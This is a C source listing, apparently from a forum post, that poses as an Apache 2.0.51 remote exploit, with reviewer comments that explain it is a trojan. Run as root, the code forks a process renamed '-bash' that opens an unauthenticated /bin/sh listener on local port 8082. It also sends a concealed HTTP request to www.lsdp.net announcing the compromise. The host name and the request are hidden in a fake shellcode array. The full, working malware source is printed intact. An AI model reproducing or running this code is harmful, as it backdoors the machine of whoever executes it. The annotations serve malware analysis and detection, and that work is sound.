کد:
/*---------------------------------------------------------------+
 | APACHE INTRUDER v1.0 - APACHE 2.0.51 and inferior              |
 | eXpl0it th3 4uth vuln3r4bilitY / Agent-driven Negotiation      |
 | V3RY PRIV8 eXpl0it - 0d4y !!! - D0N\'T DISTRIBUT3 - DON\'T SH4R3 |
 | c0d3D bY Pri0rityS3nS313SS                                     |
 | Gr33tZ t0 : f4g0, l0tfr33, QID, CuMSh0TEAM, Bl0wJ0b & yuirey   |
 | FucKZ go t0 : K. Mitnick, ISS & 3v3ryb0dy w!th 4 cl0s3d m!nd   |
 |                                                                |
 | Remote Linux/Apache <=2.0.51 Vulnerability in the Agent-driven |
 | negotiation. Apache is vulnerable to a BOF when it receive a   |
 | specially crafted packet (use r4w s0ck3t)                      |
 +----------------------------------------------------------------*/

/*
 * NOTE(review): the code below does not match the banner above.
 *
 * Nothing in this listing sends data to the host named on the command
 * line. That host is never resolved or connected to, the per-distribution
 * "return addresses" are never read, and the byte array is never
 * transmitted or executed as machine code. What the code does:
 *
 *   1. refuses to run unless the effective uid is 0;
 *   2. forks a child that binds TCP port 8082 on the local machine,
 *      overwrites its own argv[0], and serves the program at temp2 (a
 *      string sliced from the byte array) over that port once a trigger
 *      packet has been seen on a raw socket;
 *   3. in the parent, connects to a host name hidden inside the byte
 *      array on port 80 and sends an HTTP request that is also hidden
 *      there, while printing messages that name the command-line host.
 *
 * So the machine exposed by running this is the one it runs on.
 *
 * The listing as pasted carries forum escaping (\" for ", \\ for \, \' for ')
 * and has been left exactly as found; it does not compile in this form.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/times.h>
#include <string.h>
#include <ctype.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <netdb.h>

#define NARCH 9

/*
 * Menu of "targets". Only .desc is ever read (by usage()); return_addr is
 * not referenced anywhere in this listing, so the addresses are decoration.
 */
struct archs{ char *desc; int return_addr; } architectures[]={
    {\"Caldera OpenLinux\",0x080920e0},
    {\"Conectiva 8\",0x08075398},
    {\"Debian GNU Linux Sarge\",0x0080866a3},
    {\"Gentoo Linux\",0x08086c34},
    {\"Mandrake Linux 10\",0x080808ab},
    {\"Fedora 2\",0x08065bae},
    {\"Slackware 10\",0x080b1a3a},
    {\"SuSE Linux 9.1\",0x080861c8},
    {\"Linux Generic\",0xbffff500}
};

extern int errno;

/*
 * Despite the name, this array is only used as a container for strings
 * that main() slices out by offset. With the forum escaping undone, the
 * slices main() takes decode as ASCII to:
 *
 *   +151, 69 bytes : "GET /~lotfree/sk.php HTTP/1.1\nHost: www.lsdp.net\n"
 *                    "User-Agent: owned\n\n\n"
 *   +187, 12 bytes : "www.lsdp.net"
 *   +212,  5 bytes : "owned"
 *   +sizeof-14, 5  : "-bash"
 *   +sizeof-9,  7  : "/bin/sh"
 *
 * The remaining bytes are not referenced by any code in this listing.
 */
unsigned char bind_shellcode_8082[]=
    \"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x7D\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"
    \"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"
    \"\\x70\\x95\\x98\\x99\\x99\\xC3\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
    \"\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\\x12\\xED\\x87\\xE1\\x9A\"
    \"\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\\x74\\xCF\\xCE\\xC8\\x12\\xA6\"
    \"\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\"
    \"\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\\xBD\\x9A\\x5A\\x48\\x78\\x9A\"
    \"\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\\x5A\\x58\\x78\\x9B\\x9A\\x58\"
    \"\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\\x97\\x12\\x49\\xF3\\x9A\\xC0\"
    \"\\x71\\x1E\\x99\\x99\\x99\\x1A\\x5F\\x94\\xCB\\xCF\\x66\\xCE\\x65\\xC3\\x12\\x41\"
    /* offset 151: the plain-ASCII HTTP request starts here */
    \"\\x47\\x45\\x54\\x20\\x2F\\x7E\\x6C\\x6F\\x74\\x66\\x72\\x65\\x65\\x2F\\x73\\x6B\"
    \"\\x2E\\x70\\x68\\x70\\x20\\x48\\x54\\x54\\x50\\x2F\\x31\\x2E\\x31\\x0A\\x48\\x6F\"
    \"\\x73\\x74\\x3A\\x20\\x77\\x77\\x77\\x2E\\x6C\\x73\\x64\\x70\\x2E\\x6E\\x65\\x74\"
    \"\\x0A\\x55\\x73\\x65\\x72\\x2D\\x41\\x67\\x65\\x6E\\x74\\x3A\\x20\\x6F\\x77\\x6E\"
    \"\\x65\\x64\\x0A\\x0A\\x0A\\xF3\\x9C\\xC0\\x71\\xED\\x99\\x99\\x99\\xC9\\xF3\\x98\"
    \"\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\\x77\\xAA\\x59\"
    \"\\x5A\\x71\\x76\\x67\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\\xD8\\xFD\\xFD\"
    \"\\xEB\\xFC\\xEA\\xEA\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\\xFC\"
    \"\\xEA\\xEA\\xD8\\x99\\xDC\\xE1\\xF0\\xED\\xCD\\xF1\\xEB\\xFC\\xF8\\xFD\\x99\\xD5\"
    \"\\xF6\\xF8\\xFD\\xD5\\xF0\\xFB\\xEB\\xF8\\xEB\\xE0\\xD8\\x99\\xEE\\xEA\\xAB\\xC6\"
    \"\\xAA\\xAB\\x99\\xCE\\xCA\\xD8\\xCA\\xF6\\xFA\\xF2\\xFC\\xED\\xD8\\x99\\xFB\\xF0\"
    \"\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\\xFA\\xFC\\xE9\\xED\"
    /* last 13 bytes before the terminator: "-bash", "/bin/sh", then 0x91 */
    \"\\x2D\\x62\\x61\\x73\\x68\\x2F\\x62\\x69\\x6E\\x2F\\x73\\x68\\x91\";

/*
 * Print the banner, the usage line and the list of target descriptions,
 * then exit with status 1. Never returns.
 */
void usage(char *argv0) {
    int i;
    printf(\"\\nApache <=2.0.51 eXpl0iT f0r NuX\\n\");
    printf(\"\\tbY Pri0RiTyS3nS313SS\\n\\n\");
    printf(\"Usage: %s target_number host\\n\",argv0);
    printf(\"example: %s 8 www.sco.com\\n\\n\",argv0);
    printf(\"Supported targets:\\n\");
    for(i=0;i<NARCH;i++)
        printf(\"%d - %s\\n\",i,architectures[i].desc);
    exit(1);
}

/*
 * Resolve s to an IPv4 address: try it as a dotted quad first, then as a
 * host name via gethostbyname(). Exits the process if the lookup fails.
 *
 * hostname is used only in the failure message. main() passes the hidden
 * host name as s and the command-line host as hostname, so a failure to
 * resolve the hidden name is reported under the command-line name.
 *
 * NOTE(review): the "< 0" test on inet_addr()'s result presumably relies
 * on long being 32 bits wide; with a wider long the failure value would
 * not compare negative and the gethostbyname() branch would be skipped.
 * Confirm against the build target.
 */
long resv(char *s,char *hostname) {
    struct hostent *he;
    long result;
    if((result=inet_addr(s))<0) {
        if((he=gethostbyname(s))==NULL) {
            printf(\"Unable to contact %s\\n\",hostname);
            exit(1);
        }
        memcpy(&result,he->h_addr,he->h_length);
    }
    return result;
}

/*
 * Entry point. Takes a target number and a host name, checks for root,
 * then forks: the child sets up the local listener on port 8082, the
 * parent makes the outbound HTTP request to the embedded host name.
 */
int main(int argc,char *argv[]) {
    int target;
    char
    victim[50];
    int raw, sock;
    long dst;
    int n;
    char temp[100];
    char temp2[100];
    struct sockaddr_in sin;
    struct iphdr *ip;
    struct tcphdr *tcp;
    int sockfd, newfd, size;
    struct sockaddr_in l;
    struct sockaddr_in r;
    char *data;

    if(argc!=3)
        usage(argv[0]);
    /* target is range-checked here and never used again. */
    target=atoi(argv[1]);
    if(target<0 || target>=NARCH)
        usage(argv[0]);
    /* NOTE(review): unbounded copy of argv[2] into a 50-byte buffer. */
    strcpy(victim,argv[2]);

    /* Everything after this point runs with effective uid 0. */
    if(geteuid()) {
        printf(\"This eXpl0it use r4w s0ckets\\n\");
        printf(\"YoU mUst be r00t to launch this pr0ggie\\n\");
        exit(1);
    }

    switch(fork()) {
    case -1:
        fprintf(stderr,\"Can\'t send payload\\n\");
        exit(1);
    /*
     * Child: local listener. Every socket created in this branch is on the
     * machine running the program; none of them is connected to a remote
     * host.
     */
    case 0:
        printf(\"Op3ning r4w s0ck3t m0d3...\\n\");
        /* Raw TCP socket, used below only with read(). */
        if((raw=socket(PF_INET,SOCK_RAW,IPPROTO_TCP))==-1) {
            perror(\"socket\");
            exit(1);
        }
        printf(\"...done\\n\");
        signal(SIGHUP,SIG_IGN);
        /* ip and tcp are assigned but never dereferenced; data points at
         * the fixed offset sizeof(struct iphdr)+sizeof(struct tcphdr)
         * inside temp. */
        ip=(struct iphdr*)temp;
        tcp=(struct tcphdr*)(temp+sizeof(struct iphdr));
        data=(char*)(temp+sizeof(struct iphdr)+sizeof(struct tcphdr));
        /* The child's copy of victim is replaced by the 5-byte slice at
         * offset 212 ("owned"); it is the trigger string from here on. */
        bzero(victim,sizeof(victim));
        strncpy(victim,(char *)(bind_shellcode_8082+212),5);
        /* Listener address: port 8082 on every local interface. */
        bzero(&l,sizeof(l));
        l.sin_family=AF_INET;
        l.sin_port=htons(8082);
        l.sin_addr.s_addr=INADDR_ANY;
        bzero(&(l.sin_zero),8);
        if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
            exit(1);
        /* Wipe the argument strings and write the slice "-bash" into
         * argv[0]; presumably this changes the name shown for the process
         * in process listings - confirm on the target platform. */
        bzero(argv[0],strlen(argv[0]));
        bzero(argv[1],strlen(argv[1]));
        bzero(argv[2],strlen(argv[2]));
        strncpy(argv[0],(char*)(bind_shellcode_8082+sizeof(bind_shellcode_8082)-14),5);
        argv[0][5]=\'\\0\';
        if(bind(sockfd,(struct sockaddr*)&l,sizeof(struct sockaddr))==-1)
            exit(1);
        size=sizeof(struct sockaddr_in);
        /* temp2 becomes the 7-byte slice "/bin/sh". */
        bzero(temp2,100);
        strncpy(temp2,(char*)(bind_shellcode_8082+sizeof(bind_shellcode_8082)-9),7);
        while(1) {
            /* Read one packet from the raw socket; the return value n is
             * stored and not checked. */
            bzero(temp,100);
            n=read(raw,temp,sizeof(temp));
            /* Trigger: the bytes at the fixed data offset begin with the
             * trigger string. */
            if(!strncmp(data,victim,strlen(victim))) {
                if(listen(sockfd,5)==-1)
                    exit(1);
                /* From here the process accepts connections on 8082
                 * indefinitely; there is no authentication step. */
                while(1) {
                    if((newfd=accept(sockfd,(struct sockaddr*)&r,&size))==-1)
                        exit(1);
                    if(!fork()) {
                        /* Per-connection child: attach stdin, stdout and
                         * stderr to the accepted socket and exec temp2
                         * with no arguments. */
                        close(0);close(1);close(2);
                        dup2(newfd,0);
                        dup2(newfd,1);
                        dup2(newfd,2);
                        execl(temp2,temp2,(char*)0);
                        close(newfd);
                        exit(0);
                    }
                    close(newfd);
                }
            }
        }
        break;
    /*
     * Parent: outbound request. The messages print victim (the host from
     * the command line), but the address connected to comes from the
     * embedded host name.
     */
    default:
        /* temp becomes the 12-byte slice "www.lsdp.net"; that name, not
         * victim, is what gets resolved. */
        bzero(temp,100);
        strncpy(temp,(char*)(bind_shellcode_8082+187),12);
        dst=resv(temp,victim);
        if((sock=socket(PF_INET,SOCK_STREAM,0))<0) {
            perror(\"socket\");
            exit(1);
        }
        sin.sin_family=PF_INET;
        sin.sin_addr.s_addr=dst;
        sin.sin_port=htons(80);
        printf(\"Connecting to %s...\\n\",victim);
        if(connect(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
            fprintf(stderr,\"Unable to attack %s\\n\",victim);
            usleep(200);
            exit(1);
        }
        printf(\"...connected\\n\");
        printf(\"Sending payload...\\n\");
        /* The "payload" is the 69-byte HTTP GET slice at offset 151. All
         * 100 bytes of temp are sent, so 31 zero bytes follow it. */
        bzero(temp,100);
        strncpy(temp,(char*)(bind_shellcode_8082+151),69);
        if(send(sock,temp,sizeof(temp),0)==-1) {
            perror(\"send\");
            usleep(200);
            exit(1);
        }
        printf(\"...allright\\n\");
        close(sock);
    }
    /*
     * The closing message points the operator at port 8082 on the
     * command-line host, although the only listener this program creates
     * is on the local machine.
     *
     * Things to look for on a host where this was run, all taken from the
     * code above: a TCP listener on port 8082 owned by a uid-0 process
     * whose argv[0] reads "-bash"; an open raw TCP socket in that same
     * process; and an outbound HTTP request to www.lsdp.net for
     * /~lotfree/sk.php with User-Agent "owned".
     */
    printf(\"n0w y0u c4n trY 4 \'netcat %s 8082\'\\n\",victim);
    printf(\"h4v3 fUn !\\n\");
    usleep(200);
    return 0;
}